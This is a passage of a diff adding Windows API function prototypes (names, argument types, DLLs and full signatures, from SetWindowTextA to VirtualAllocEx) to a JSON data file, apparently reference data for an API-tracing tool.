+ }, + { + "function_name": "SetWindowTextA", + "arguments": [ + "HWND", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetWindowTextA(HWND hwnd, LPCTSTR lpsz);" + }, + { + "function_name": "SetWindowTextW", + "arguments": [ + "HWND", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetWindowTextW(HWND hwnd, LPCWSTR lpsz);" + }, + { + "function_name": "SetWindowWord", + "arguments": [ + "HWND", + "int", + "WORD" + ], + "dll_name": "user32.dll", + "full_prototype": "WORD SetWindowWord(HWND hwnd, int nIndex, WORD wNewWord);" + }, + { + "function_name": "SetWinMetaFileBits", + "arguments": [ + "UINT", + "CONST BYTE *", + "HDC", + "CONST METAFILEPICT *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HENHMETAFILE SetWinMetaFileBits(UINT cbBuffer,CONST BYTE * lpbBuffer, HDC hdcRef, CONST METAFILEPICT * lpmfp);" + }, + { + "function_name": "SetWindowOrgEx", + "arguments": [ + "HDC", + "int", + "int", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetWindowOrgEx(HDC hdc, int X, int Y, LPPOINT lpPoint);" + }, + { + "function_name": "SetWorldTransform", + "arguments": [ + "HDC", + "CONST XFORM *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetWorldTransform(HDC hdc, CONST XFORM * lpXform);" + }, + { + "function_name": "SHAddToRecentDocs", + "arguments": [ + "UINT", + "LPCVOID" + ], + "dll_name": "shell32.dll", + "full_prototype": "WINSHELLAPI void WINAPI SHAddToRecentDocs(UINT uFlags, LPCVOID pv);" + }, + { + "function_name": "SHAppBarMessage", + "arguments": [ + "DWORD", + "PAPPBARDATA" + ], + "dll_name": "shell32.dll", + "full_prototype": "WINSHELLAPI UINT APIENTRY SHAppBarMessage(DWORD dwMessage, PAPPBARDATA pabd);" + }, + { + "function_name": "SHBrowseForFolder", + "arguments": [ + "LPBROWSEINFO" + ], + "dll_name": "shell32.dll", + "full_prototype": "WINSHELLAPI LPITEMIDLIST WINAPI SHBrowseForFolder(LPBROWSEINFO lpbi);" + }, + { + "function_name": "SHCopyKeyA", + "arguments": [ + "HKEY", + "LPCSTR", + "HKEY", + "DWORD" + ], + "dll_name": "shell32.dll", + "full_prototype": "DWORD SHCopyKeyA(HKEY hKeySrc, LPCSTR lpszSrcSubKey, HKEY hKeyDst, DWORD dwReserved);" + }, + { + "function_name": "ShellAboutA", + "arguments": [ + "HWND", + "LPCTSTR", + "LPCTSTR", + "HICON" + ], + "dll_name": "shell32.dll", + "full_prototype": "int ShellAboutA(HWND hWnd,LPCTSTR szApp,LPCTSTR szOtherStuff, HICON hIcon);" + }, + { + "function_name": "ShellExecuteA", + "arguments": [ + "HWND", + "LPCTSTR", + "LPCTSTR", + "LPTSTR", + "LPCTSTR", + "INT" + ], + "dll_name": "shell32.dll", + "full_prototype": "HINSTANCE ShellExecuteA( HWND hwnd, LPCTSTR lpOperation, LPCTSTR lpFile, LPTSTR lpParameters, LPCTSTR lpDirectory, INT nShowCmd );" + }, + { + "function_name": "ShellExecuteEx", + "arguments": [ + "LPSHELLEXECUTEINFO" + ], + "dll_name": "shell32.dll", + "full_prototype": "WINSHELLAPI BOOL WINAPI ShellExecuteEx(LPSHELLEXECUTEINFO lpExecInfo);" + }, + { + "function_name": "Shell_NotifyIconA", + "arguments": [ + "DWORD", + "PNOTIFYICONDATA" + ], + "dll_name": "shell32.dll", + "full_prototype": "BOOL Shell_NotifyIconA( DWORD dwMessage, PNOTIFYICONDATA lpdata);" + }, + { + "function_name": "SHEmptyRecycleBinA", + "arguments": [ + "HWND", + "LPCTSTR", + "DWORD" + ], + "dll_name": "shell32.dll", + "full_prototype": "HRESULT SHEmptyRecycleBinA( HWND hwnd, LPCTSTR pszRootPath, DWORD dwFlags);" + }, + { + "function_name": "SHFileOperationA", + "arguments": [ + "LPSHFILEOPSTRUCT" + ], + "dll_name": "shell32.dll", + "full_prototype": "WINSHELLAPI int WINAPI SHFileOperationA(LPSHFILEOPSTRUCT lpFileOp);" + }, + { + "function_name": "SHFormatDrive", + "arguments": [ + "HWND", + "UINT", + "UINT", + "UINT" + ], + "dll_name": "shell32.dll", + "full_prototype": "DWORD SHFormatDrive( HWND hwnd, UINT drive, UINT fmtID, UINT options);" + }, + { + "function_name": "SHGetPathFromIDList", + "arguments": [ + "LPCITEMIDLIST", + "LPSTR" + ], + "dll_name": "shell32.dll", + "full_prototype": "WINSHELLAPI BOOL WINAPI SHGetPathFromIDList(LPCITEMIDLIST pidl, LPSTR pszPath);" + }, + { + "function_name": "ShowCaret", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ShowCaret(HWND hwnd);" + }, + { + "function_name": "ShowCursor", + "arguments": [ + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "int ShowCursor( BOOL bShow);" + }, + { + "function_name": "ShowOwnedPopups", + "arguments": [ + "HWND", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ShowOwnedPopups(HWND hwnd, BOOL fShow);" + }, + { + "function_name": "ShowScrollBar", + "arguments": [ + "HWND", + "int", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ShowScrollBar(HWND hwnd,int fnBar,BOOL fShow);" + }, + { + "function_name": "ShowWindow", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ShowWindow( HWND hwnd, int nCmdShow);" + }, + { + "function_name": "ShowWindowAsync", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ShowWindowAsync(HWND hwnd, int nCmdShow);" + }, + { + "function_name": "SHSetValueA", + "arguments": [ + "HKEY", + "LPCSTR", + "LPCSTR", + "DWORD", + "LPCVOID", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "DWORD SHSetValueA(HKEY hKey, LPCSTR lpszSubKey, LPCSTR lpszValue, DWORD dwType, LPCVOID pvData, DWORD cbData);" + }, + { + "function_name": "SignalObjectAndWait", + "arguments": [ + "HANDLE", + "HANDLE", + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SignalObjectAndWait(HANDLE hObjectToSignal, HANDLE hObjectToWaitOn, DWORD dwMilliseconds, BOOL bAlertable);" + }, + { + "function_name": "SizeofResource", + "arguments": [ + "HINSTANCE", + "HRSRC" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SizeofResource(HINSTANCE hModule, HRSRC hrsrc);" + }, + { + "function_name": "Sleep", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID Sleep(DWORD cMilliseconds);" + }, + { + "function_name": "SleepEx", + "arguments": [ + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SleepEx(DWORD dwTimeout, BOOL fAlertable);" + }, + { + "function_name": "sndPlaySoundA", + "arguments": [ + "LPCSTR", + "UINT" + ], + "dll_name": "winmm.dll", + "full_prototype": "BOOL sndPlaySoundA(LPCSTR lpszSound, UINT fuSound);" + }, + { + "function_name": "SQLAllocConnect", + "arguments": [ + "HENV", + "HDBC FAR *" + ], + "dll_name": "odbc32.dll", + "full_prototype": "RETCODE SQLAllocConnect(HENV henv, HDBC FAR * phdbc);" + }, + { + "function_name": "SQLAllocEnv", + "arguments": [ + "HENV FAR" + ], + "dll_name": "odbc32.dll", + "full_prototype": "RETCODE SQLAllocEnv(HENV FAR *phenv);" + }, + { + "function_name": "SQLAllocStmt", + "arguments": [ + "HDBC", + "HSTMT FAR *" + ], + "dll_name": "odbc32.dll", + "full_prototype": "RETCODE SQLAllocStmt(HDBC hdbc, HSTMT FAR * phstmt);" + }, + { + "function_name": "SQLBindCol", + "arguments": [ + "SQLHSTMT", + "SQLUSMALLINT", + "SQLSMALLINT", + "SQLPOINTER", + "SQLLEN", + "SQLLEN *" + ], + "dll_name": "odbc32.dll", + "full_prototype": "UL_FN_SPEC SQLRETURN UL_FN_MOD SQLBindCol(SQLHSTMT StatementHandle,SQLUSMALLINT ColumnNumber,SQLSMALLINT TargetType,SQLPOINTER TargetValue,SQLLEN BufferLength,SQLLEN * pcbValue);" + }, + { + "function_name": "SQLBindParameter", + "arguments": [ + "SQLHSTMT", + "SQLUSMALLINT", + "SQLSMALLINT", + "SQLSMALLINT", + "SQLSMALLINT", + "SQLUINTEGER", + "SQLSMALLINT", + "SQLPOINTER", + "SQLINTEGER", + "SQLINTEGER *" + ], + "dll_name": "odbc32.dll", + "full_prototype": "SQLRETURN SQLBindParameter( SQLHSTMT StatementHandle, SQLUSMALLINT ParameterNumber, SQLSMALLINT InputOutputType, SQLSMALLINT ValueType, SQLSMALLINT ParameterType, SQLUINTEGER ColumnSize, SQLSMALLINT DecimalDigits, SQLPOINTER ParameterValuePtr, SQLINTEGER BufferLength, SQLINTEGER * StrLen_or_IndPtr);" + }, + { + "function_name": "SQLConfigDataSource", + "arguments": [ + "HWND", + "WORD", + "LPCSTR", + "LPCSTR" + ], + "dll_name": "odbccp32.dll", + "full_prototype": "BOOL SQLConfigDataSource( HWND hwndParent, WORD fRequest, LPCSTR lpszDriver, LPCSTR lpszAttributes);" + }, + { + "function_name": "StartDocA", + "arguments": [ + "HDC", + "CONST DOCINFO *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int StartDocA( HDC hdc, CONST DOCINFO * lpdi);" + }, + { + "function_name": "StartDocW", + "arguments": [ + "HDC", + "CONST DOCINFOW *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int StartDocW(HDC hdc,CONST DOCINFOW * lpdi);" + }, + { + "function_name": "StartPage", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int StartPage(HDC hDC);" + }, + { + "function_name": "StretchBlt", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "HDC", + "int", + "int", + "int", + "int", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL StretchBlt( HDC hdcDest, int nXOriginDest, int nYOriginDest, int nWidthDest, int nHeightDest, HDC hdcSrc, int nXOriginSrc, int nYOriginSrc, int nWidthSrc, int nHeightSrc, DWORD dwRop );" + }, + { + "function_name": "StretchDIBits", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "int", + "int", + "int", + "int", + "CONST VOID", + "CONST BITMAPINFO *", + "UINT", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int StretchDIBits(HDC hdc, int XDest, int YDest, int nDestWidth,int nDestHeight, int XSrc, int YSrc, int nSrcWidth, int nSrcHeight, CONST VOID *lpBits, CONST BITMAPINFO * lpBitsInfo, UINT iUsage, DWORD dwRop);" + }, + { + "function_name": "StrIsIntlEqualA", + "arguments": [ + "BOOL", + "LPCTSTR", + "LPCTSTR", + "INT" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL StrIsIntlEqualA(BOOL fCaseSens, LPCTSTR String1, LPCTSTR String2, INT nChar);" + }, + { + "function_name": "StrNCatA", + "arguments": [ + "LPSTR", + "LPCSTR", + "INT" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "LPSTR StrNCatA(LPSTR lpszStr, LPCSTR lpszCat, INT cchMax);" + }, + { + "function_name": "StrokeAndFillPath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL StrokeAndFillPath(HDC hdc);" + }, + { + "function_name": "StrokePath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL StrokePath(HDC hdc);" + }, + { + "function_name": "StrToIntExA", + "arguments": [ + "LPCSTR", + "DWORD", + "LPINT" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL StrToIntExA( LPCSTR lpszStr, DWORD dwFlags, LPINT lpiRet);" + }, + { + "function_name": "StrTrimA", + "arguments": [ + "LPSTR", + "LPCSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL StrTrimA( LPSTR lpszStr, LPCSTR lpszTrim);" + }, + { + "function_name": "SubtractRect", + "arguments": [ + "LPRECT", + "CONST RECT *", + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SubtractRect(LPRECT lprcDest, CONST RECT * lprcSrc1, CONST RECT * lprcSrc2);" + }, + { + "function_name": "SuspendThread", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SuspendThread(HANDLE hThread);" + }, + { + "function_name": "SwapBuffers", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SwapBuffers(HDC hdc);" + }, + { + "function_name": "SwapMouseButton", + "arguments": [ + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SwapMouseButton(BOOL fSwap);" + }, + { + "function_name": "SwitchDesktop", + "arguments": [ + "HDESK" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SwitchDesktop(HDESK hDesk);" + }, + { + "function_name": "SwitchToFiber", + "arguments": [ + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID SwitchToFiber(LPVOID lpFiber);" + }, + { + "function_name": "SwitchToThread", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SwitchToThread(void);" + }, + { + "function_name": "SystemParametersInfoA", + "arguments": [ + "UINT", + "UINT", + "PVOID", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SystemParametersInfoA(UINT uiAction, UINT uiParam, PVOID pvParam, UINT fWinIni);" + }, + { + "function_name": "SystemParametersInfoW", + "arguments": [ + "UINT", + "UINT", + "PVOID", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SystemParametersInfoW(UINT uiAction, UINT uiParam, PVOID pvParam, UINT fWinIni);" + }, + { + "function_name": "SystemTimeToFileTime", + "arguments": [ + "CONST SYSTEMTIME *", + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SystemTimeToFileTime(CONST SYSTEMTIME * lpst, LPFILETIME lpft);" + }, + { + "function_name": "SystemTimeToTzSpecificLocalTime", + "arguments": [ + "LPTIME_ZONE_INFORMATION", + "LPSYSTEMTIME", + "LPSYSTEMTIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SystemTimeToTzSpecificLocalTime(LPTIME_ZONE_INFORMATION lpTimeZoneInformation, LPSYSTEMTIME lpUniversalTime, LPSYSTEMTIME lpLocalTime);" + }, + { + "function_name": "TabbedTextOutA", + "arguments": [ + "HDC", + "int", + "int", + "LPCTSTR", + "int", + "int", + "LPINT", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG TabbedTextOutA(HDC hdc, int x, int y, LPCTSTR lpString, int nCount, int nTabPositions, LPINT lpnTabStopPositions, int nTabOrigin);" + }, + { + "function_name": "TabbedTextOutW", + "arguments": [ + "HDC", + "int", + "int", + "LPCWSTR", + "int", + "int", + "LPINT", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG TabbedTextOutW(HDC hdc, int x, int y, LPCWSTR lpString, int nCount, int nTabPositions, LPINT lpnTabStopPositions, int nTabOrigin);" + }, + { + "function_name": "TerminateProcess", + "arguments": [ + "HANDLE", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL TerminateProcess(HANDLE hProcess, UINT uExitCode);" + }, + { + "function_name": "TerminateThread", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL TerminateThread(HANDLE hThread, DWORD dwExitCode);" + }, + { + "function_name": "TextOutA", + "arguments": [ + "HDC", + "int", + "int", + "LPCTSTR", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL TextOutA(HDC hdc,int nXStart, int nYStart,LPCTSTR lpString, int cbString);" + }, + { + "function_name": "TextOutW", + "arguments": [ + "HDC", + "int", + "int", + "LPCWSTR", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL TextOutW(HDC hdc,int nXStart, int nYStart,LPCWSTR lpString, int cbString);" + }, + { + "function_name": "TileWindows", + "arguments": [ + "HWND", + "WORD", + "LPCRECT", + "WORD", + "const HWND FAR" + ], + "dll_name": "user32.dll", + "full_prototype": "WORD WINAPI TileWindows( HWND hwndParent, WORD wFlags, LPCRECT lpRect, WORD cChildrenb, const HWND FAR *ahwndChildren );" + }, + { + "function_name": "TlsAlloc", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD TlsAlloc(VOID);" + }, + { + "function_name": "TlsFree", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL TlsFree(DWORD dwTlsIndex);" + }, + { + "function_name": "TlsGetValue", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID TlsGetValue(DWORD dwTlsIndex);" + }, + { + "function_name": "TlsSetValue", + "arguments": [ + "DWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL TlsSetValue(DWORD dwTlsIndex,LPVOID lpvTlsValue);" + }, + { + "function_name": "ToAscii", + "arguments": [ + "UINT", + "UINT", + "PBYTE", + "LPWORD", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int ToAscii(UINT uVirtKey,UINT uScanCode, PBYTE lpbKeyState, LPWORD lpwTransKey, UINT fuState);" + }, + { + "function_name": "ToAsciiEx", + "arguments": [ + "UINT", + "UINT", + "BYTE", + "DWORD", + "UINT", + "HKL" + ], + "dll_name": "user32.dll", + "full_prototype": "int ToAsciiEx(UINT uVirtKey, UINT ScanCode,BYTE *lpbKeyState, DWORD *lpdwTransKey, UINT fuState, HKL hkl);" + }, + { + "function_name": "TouchFileTimes", + "arguments": [ + "HANDLE", + "PSYSTEMTIME" + ], + "dll_name": "imagehlp.dll", + "full_prototype": "BOOL TouchFileTimes( HANDLE FileHandle, PSYSTEMTIME pSystemTime);" + }, + { + "function_name": "ToUnicode", + "arguments": [ + "UINT", + "UINT", + "PBYTE", + "LPWSTR", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int ToUnicode(UINT wVirtKey, UINT wScanCode, PBYTE lpKeyState, LPWSTR pwszBuff, int cchBuff, UINT wFlags);" + }, + { + "function_name": "ToUnicodeEx", + "arguments": [ + "UINT", + "UINT", + "const BYTE", + "LPWSTR", + "int", + "UINT", + "HKL" + ], + "dll_name": "user32.dll", + "full_prototype": "int ToUnicodeEx(UINT wVirtKey, UINT wScanCode, const BYTE *lpKeyState, LPWSTR pwszBuff, int cchBuff, UINT wFlags, HKL dwhkl);" + }, + { + "function_name": "TrackMouseEvent", + "arguments": [ + "LPTRACKMOUSEEVENT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL TrackMouseEvent(LPTRACKMOUSEEVENT lpEventTrack);" + }, + { + "function_name": "TrackPopupMenu", + "arguments": [ + "HMENU", + "UINT", + "int", + "int", + "int", + "HWND", + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL TrackPopupMenu( HMENU hMenu, UINT uFlags, int x, int y, int nReserved, HWND hWnd, CONST RECT * prcRect );" + }, + { + "function_name": "TrackPopupMenuEx", + "arguments": [ + "HMENU", + "UINT", + "int", + "int", + "HWND", + "LPTPMPARAMS" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL TrackPopupMenuEx(HMENU hmenu, UINT fuFlags, int x, int y, HWND hwnd, LPTPMPARAMS lptpm);" + }, + { + "function_name": "TransactNamedPipe", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "LPVOID", + "DWORD", + "LPDWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL TransactNamedPipe(HANDLE hNamedPipe, LPVOID lpvWriteBuf, DWORD cbWriteBuf, LPVOID lpvReadBuf,DWORD cbReadBuf, LPDWORD lpcbRead, LPOVERLAPPED lpo);" + }, + { + "function_name": "TranslateAcceleratorA", + "arguments": [ + "HWND", + "HACCEL", + "LPMSG" + ], + "dll_name": "user32.dll", + "full_prototype": "int TranslateAcceleratorA(HWND hwnd, HACCEL haccl, LPMSG lpmsg);" + }, + { + "function_name": "TranslateAcceleratorW", + "arguments": [ + "HWND", + "HACCEL", + "LPMSG" + ], + "dll_name": "user32.dll", + "full_prototype": "int TranslateAcceleratorW(HWND hwnd, HACCEL haccl, LPMSG lpmsg);" + }, + { + "function_name": "TranslateCharsetInfo", + "arguments": [ + "DWORD FAR *", + "LPCHARSETINFO", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT TranslateCharsetInfo(DWORD FAR * lpSrc, LPCHARSETINFO lpCs, DWORD dwFlags);" + }, + { + "function_name": "TranslateMDISysAccel", + "arguments": [ + "HWND", + "LPMSG" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL TranslateMDISysAccel(HWND hwndClient,LPMSG lpmsg);" + }, + { + "function_name": "TranslateMessage", + "arguments": [ + "CONST MSG" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL TranslateMessage(CONST MSG *lpmsg);" + }, + { + "function_name": "TransmitCommChar", + "arguments": [ + "HANDLE", + "char" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL TransmitCommChar(HANDLE hCommDev, char chTransmit);" + }, + { + "function_name": "TryEnterCriticalSection", + "arguments": [ + "LPCRITICAL_SECTION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL TryEnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection);" + }, + { + "function_name": "UnhandledExceptionFilter", + "arguments": [ + "STRUCT _EXCEPTION_POINTERS *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LONG UnhandledExceptionFilter(STRUCT _EXCEPTION_POINTERS * lpexpExceptionInfo);" + }, + { + "function_name": "UnhookWindowsHook", + "arguments": [ + "int", + "HOOKPROC" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnhookWindowsHook(int nCode, HOOKPROC hkprc);" + }, + { + "function_name": "UnhookWindowsHookEx", + "arguments": [ + "HHOOK" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnhookWindowsHookEx(HHOOK hhook);" + }, + { + "function_name": "UnionRect", + "arguments": [ + "LPRECT", + "CONST RECT", + "CONST RECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnionRect(LPRECT lprcDst, CONST RECT *lprcSrc1, CONST RECT *lprcSrc2);" + }, + { + "function_name": "UnloadKeyboardLayout", + "arguments": [ + "HKL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnloadKeyboardLayout(HKL hkl);" + }, + { + "function_name": "UnlockFile", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL UnlockFile(HANDLE hFile, DWORD dwFileOffsetLow, DWORD dwFileOffsetHigh, DWORD cbUnlockLow,DWORD cbUnlockHigh);" + }, + { + "function_name": "UnlockFileEx", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL UnlockFileEx(HANDLE hFile, DWORD dwReserved, DWORD nNumberOfBytesToUnlockLow,DWORD nNumberOfBytesToUnlockHigh, LPOVERLAPPED lpOverlapped);" + }, + { + "function_name": "UnmapViewOfFile", + "arguments": [ + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL UnmapViewOfFile(LPVOID lpBaseAddress);" + }, + { + "function_name": "UnpackDDElParam", + "arguments": [ + "UINT", + "LONG", + "PUINT", + "PUINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnpackDDElParam(UINT uMsg, LONG lParam, PUINT puLow, PUINT puHigh);" + }, + { + "function_name": "UnrealizeObject", + "arguments": [ + "HGDIOBJ" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL UnrealizeObject(HGDIOBJ hgdiobj);" + }, + { + "function_name": "UnregisterClassA", + "arguments": [ + "LPCTSTR", + "HINSTANCE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnregisterClassA(LPCTSTR lpszClass, HINSTANCE hinst);" + }, + { + "function_name": "UnregisterClassW", + "arguments": [ + "LPCWSTR", + "HINSTANCE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnregisterClassW(LPCWSTR lpszClass, HINSTANCE hinst);" + }, + { + "function_name": "UnregisterDeviceNotification", + "arguments": [ + "HDEVNOTIFY" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnregisterDeviceNotification(HDEVNOTIFY Handle);" + }, + { + "function_name": "UnregisterHotKey", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UnregisterHotKey(HWND hwnd, int idHotKey);" + }, + { + "function_name": "UpdateColors", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL UpdateColors(HDC hdc);" + }, + { + "function_name": "UpdateResourceA", + "arguments": [ + "HANDLE", + "LPCTSTR", + "LPCTSTR", + "WORD", + "LPVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL UpdateResourceA(HANDLE hUpdateFile, LPCTSTR lpszType, LPCTSTR lpszName, WORD IDLanguage, LPVOID lpvData, DWORD cbData);" + }, + { + "function_name": "UpdateResourceW", + "arguments": [ + "HANDLE", + "LPCWSTR", + "LPCWSTR", + "WORD", + "LPVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL UpdateResourceW(HANDLE hUpdate, LPCWSTR lpType, LPCWSTR lpName, WORD wLanguage, LPVOID lpData, DWORD cbData);" + }, + { + "function_name": "UpdateWindow", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL UpdateWindow(HWND hwnd);" + }, + { + "function_name": "UrlCanonicalizeA", + "arguments": [ + "LPCSTR", + "LPSTR", + "LPDWORD", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "HRESULT UrlCanonicalizeA( LPCSTR pszUrl, LPSTR pszCanonicalized, LPDWORD pcchCanonicalized, DWORD dwFlags);" + }, + { + "function_name": "UrlCombineA", + "arguments": [ + "LPCSTR", + "LPCSTR", + "LPSTR", + "LPDWORD", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "HRESULT UrlCombineA( LPCSTR pszBase, LPCSTR pszRelative, LPSTR pszCombined, LPDWORD pcchCombined, DWORD dwFlags);" + }, + { + "function_name": "UrlCreateFromPathA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "LPDWORD", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "HRESULT UrlCreateFromPathA( LPCTSTR pszPath, LPTSTR pszUrl, LPDWORD pcchUrl, DWORD dwReserved);" + }, + { + "function_name": "UrlEscapeA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "LPDWORD", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "HRESULT UrlEscapeA( LPCTSTR pszURL, LPTSTR pszEscaped, LPDWORD pcchEscaped, DWORD dwFlags);" + }, + { + "function_name": "UrlGetPartA", + "arguments": [ + "LPCSTR", + "LPSTR", + "LPDWORD", + "DWORD", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "HRESULT UrlGetPartA( LPCSTR pszIn, LPSTR pszOut, LPDWORD pcchOut, DWORD dwPart, DWORD dwFlags );" + }, + { + "function_name": "UrlIsOpaqueA", + "arguments": [ + "LPCSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL UrlIsOpaqueA( LPCSTR pszUrl);" + }, + { + "function_name": "UrlUnescapeA", + "arguments": [ + "LPSTR", + "LPSTR", + "LPDWORD", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "HRESULT UrlUnescapeA( LPSTR pszUrl, LPSTR pszUnescaped, LPDWORD pcchUnescaped, DWORD dwFlags );" + }, + { + "function_name": "ValidateRect", + "arguments": [ + "HWND", + "CONST RECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ValidateRect(HWND hwnd, CONST RECT *lprc);" + }, + { + "function_name": "ValidateRgn", + "arguments": [ + "HWND", + "HRGN" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ValidateRgn(HWND hwnd, HRGN hrgn);" + }, + { + "function_name": "VerifyScreenSavePwd", + "arguments": [ + "HWND" + ], + "dll_name": "password.cpl", + "full_prototype": "BOOL VerifyScreenSavePwd(HWND hwnd);" + }, + { + "function_name": "VerLanguageNameA", + "arguments": [ + "DWORD", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD VerLanguageNameA( DWORD idLang,LPTSTR lpszLang, DWORD cbLang);" + }, + { + "function_name": "VerLanguageNameW", + "arguments": [ + "DWORD", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD VerLanguageNameW(DWORD wLang, LPWSTR szLang, DWORD nSize);" + }, + { + "function_name": "VirtualAlloc", + "arguments": [ + "LPVOID", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID VirtualAlloc(LPVOID lpvAddress,DWORD cbSize, DWORD fdwAllocationType, DWORD fdwProtect);" + }, + { + "function_name": "VirtualAllocEx", + "arguments": [ + "HANDLE", + "LPVOID", + "SIZE_T", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, 